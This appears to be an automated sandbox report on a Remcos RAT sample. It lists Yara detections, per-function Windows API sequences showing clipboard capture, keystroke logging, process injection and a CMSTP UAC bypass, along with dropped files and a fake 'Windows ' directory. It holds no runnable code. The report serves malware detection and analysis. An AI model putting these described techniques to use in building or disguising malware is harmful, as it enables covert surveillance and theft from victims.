              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_029559C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,19_2_029559C6
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02935A45 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_02935A45
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02929B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,6_2_02929B10
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0293BB77 SystemParametersInfoW,6_2_0293BB77
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0295BB77 SystemParametersInfoW,19_2_0295BB77

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D48730 NtQueueApcThread,0_2_02D48730
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D47A2C NtAllocateVirtualMemory,0_2_02D47A2C
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02D4DC8C
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02D4DC04
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02D4DD70
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D47D78 NtWriteVirtualMemory,0_2_02D47D78
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D48D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02D48D70
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D48D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_02D48D6E
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D47A2A NtAllocateVirtualMemory,0_2_02D47A2A
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02D4DBB0
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E464CA NtQueryInformationToken,9_2_00E464CA
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E57460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,9_2_00E57460
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E44823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,9_2_00E44823
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E4643A NtOpenThreadToken,NtOpenProcessToken,NtClose,9_2_00E4643A
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E5C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,9_2_00E5C1FA
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E5A135 NtSetInformationFile,9_2_00E5A135
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E46500 NtQueryInformationToken,NtQueryInformationToken,9_2_00E46500
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E34E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,9_2_00E34E3B
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E44759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,9_2_00E44759
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E464CA NtQueryInformationToken,11_2_00E464CA
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E57460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00E57460
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E44823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00E44823
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E4643A NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00E4643A
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E5C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00E5C1FA
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E5A135 NtSetInformationFile,11_2_00E5A135
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E46500 NtQueryInformationToken,NtQueryInformationToken,11_2_00E46500
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E34E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,11_2_00E34E3B
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E44759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,11_2_00E44759
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E38730 NtQueueApcThread,15_2_02E38730
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E37A2C NtAllocateVirtualMemory,15_2_02E37A2C
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E3DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,15_2_02E3DD70
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E37D78 NtWriteVirtualMemory,15_2_02E37D78
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E37AC9 NtAllocateVirtualMemory,15_2_02E37AC9
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E37A2A NtAllocateVirtualMemory,15_2_02E37A2A
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E3DBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02E3DBB0
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E3DC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,15_2_02E3DC8C
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E3DC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02E3DC04
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E38D6E GetThreadContext,SetThreadContext,NtResumeThread,15_2_02E38D6E
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E38D70 GetThreadContext,SetThreadContext,NtResumeThread,15_2_02E38D70
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E34C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,9_2_00E34C10
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D48788 CreateProcessAsUserW,0_2_02D48788
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029358B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,6_2_029358B9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_029558B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,19_2_029558B9
              Source: C:\Users\Public\alpha.pifFile created: C:\WindowsJump to behavior
              Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64Jump to behavior
              Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DF43CB0_2_02DF43CB
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DF83B00_2_02DF83B0
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D320C40_2_02D320C4
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DF419C0_2_02DF419C
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DEE6E00_2_02DEE6E0
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DD46010_2_02DD4601
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DF46280_2_02DF4628
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DCA4D50_2_02DCA4D5
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02E0A4900_2_02E0A490
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DDE4030_2_02DDE403
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DDE53D0_2_02DDE53D
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3C9DF0_2_02D3C9DF
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3C98F0_2_02D3C98F
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DE89070_2_02DE8907
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02E096620_2_02E09662
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DDD7E40_2_02DDD7E4
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DED73A0_2_02DED73A
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DD5B6F0_2_02DD5B6F
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DE9FD90_2_02DE9FD9
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DF3F6D0_2_02DF3F6D
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02E03CC90_2_02E03CC9
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D8BCF40_2_02D8BCF4
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DDDD5B0_2_02DDDD5B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029462546_2_02946254
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029513776_2_02951377
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0295D0986_2_0295D098
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029720D26_2_029720D2
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0293D0716_2_0293D071
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029561AA6_2_029561AA
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029571506_2_02957150
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029467CB6_2_029467CB
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0296C7396_2_0296C739
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0293E5DF6_2_0293E5DF
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02952A496_2_02952A49
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0295C9DD6_2_0295C9DD
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0295CE3B6_2_0295CE3B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02960E206_2_02960E20
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02946E736_2_02946E73
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02946FAD6_2_02946FAD
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02972F006_2_02972F00
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02932F456_2_02932F45
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0295CC0C6_2_0295CC0C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02954D226_2_02954D22
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E374B19_2_00E374B1
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E448759_2_00E44875
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E3540A9_2_00E3540A
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E34C109_2_00E34C10
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E541919_2_00E54191
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E391449_2_00E39144
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E5695A9_2_00E5695A
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E44EC19_2_00E44EC1
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E43EB39_2_00E43EB3
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E45A869_2_00E45A86
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E5769E9_2_00E5769E
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E53E669_2_00E53E66
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E3D6609_2_00E3D660
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E36E579_2_00E36E57
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E37A349_2_00E37A34
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E3EE039_2_00E3EE03
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E40BF09_2_00E40BF0
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E407409_2_00E40740
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E36B209_2_00E36B20
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E374B111_2_00E374B1
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E4487511_2_00E44875
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E3540A11_2_00E3540A
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E34C1011_2_00E34C10
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E5419111_2_00E54191
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E3914411_2_00E39144
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E5695A11_2_00E5695A
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E44EC111_2_00E44EC1
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E43EB311_2_00E43EB3
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E45A8611_2_00E45A86
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E5769E11_2_00E5769E
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E53E6611_2_00E53E66
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E3D66011_2_00E3D660
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E36E5711_2_00E36E57
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E37A3411_2_00E37A34
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E3EE0311_2_00E3EE03
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E40BF011_2_00E40BF0
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E4074011_2_00E40740
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E36B2011_2_00E36B20
              Source: C:\Users\Public\xpha.pifCode function: 12_2_00841E2612_2_00841E26
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: 15_2_02E220C415_2_02E220C4
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0296625419_2_02966254
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0297137719_2_02971377
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0297D09819_2_0297D098
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_029920D219_2_029920D2
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0295D07119_2_0295D071
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_029761AA19_2_029761AA
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0297715019_2_02977150
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_029667CB19_2_029667CB
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0298C73919_2_0298C739
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0295E5DF19_2_0295E5DF
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02972A4919_2_02972A49
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0297C9DD19_2_0297C9DD
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0297CE3B19_2_0297CE3B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02980E2019_2_02980E20
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02966E7319_2_02966E73
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02966FAD19_2_02966FAD
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02992F0019_2_02992F00
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02952F4519_2_02952F45
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0297CC0C19_2_0297CC0C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02974D2219_2_02974D22
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: String function: 02D489D0 appears 45 times
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: String function: 02DB9677 appears 38 times
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: String function: 02D344DC appears 74 times
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: String function: 02D4894C appears 56 times
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: String function: 02DEB540 appears 46 times
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: String function: 02D34860 appears 949 times
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: String function: 02D34500 appears 33 times
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: String function: 02D346D4 appears 244 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 02953FB0 appears 55 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 02973FB0 appears 55 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 029220E7 appears 41 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 02921F66 appears 49 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 029538A5 appears 41 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 029420E7 appears 39 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 029738A5 appears 41 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 02941F66 appears 49 times
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: String function: 02E24860 appears 683 times
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: String function: 02E3894C appears 50 times
